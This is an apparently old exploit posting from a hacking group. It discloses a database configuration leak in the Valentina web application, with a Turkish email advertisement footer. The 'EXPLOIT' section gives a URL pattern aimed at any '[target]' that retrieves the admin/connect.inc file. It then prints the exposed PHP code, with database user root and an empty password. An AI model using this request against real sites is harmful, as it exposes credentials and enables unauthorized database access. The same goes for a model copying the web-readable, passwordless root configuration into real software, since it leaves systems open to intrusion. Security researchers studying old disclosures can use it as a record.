Valentina suffers from a database configuration disclosure vulnerability.
3244696757bac2ee26830bd88712890ccbd1f0c363127d4ae8325530d4685563
< ------------------- header data start ------------------- >
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
# Application Name : Valentina
# Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability
# Infection : SQL Info Get...
# Author : Septemb0x
# Script Down.& WebSite : http://s2.dosya.tc/valentina.zip.html - http://www.valya.ru
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
http://[target]/[path]/admin/connect.inc
GET TO;
<?
$DB_HOST = "localhost"; // âåáñåðâåð áàçû äàííûõ
$DB_USER = "root"; // èìÿ ïîëüçîâàòåëÿ áàçû
$DB_PASS = ""; // ïàðîëü
$DB_NAME = "root"; // èìÿ áàçû
mysql_connect($DB_HOST,$DB_USER,$DB_PASS) or die (mysql_error());
mysql_select_db($DB_NAME) or die (mysql_error());
?>
< -- bug code end of -- >
# Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends...
_________________________________________________________________
Teker teker mi, yoksa hepsi birden mi? Arkadaþlarýnýzla ilgili güncel bilgileri tek bir yerden edinin.
http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx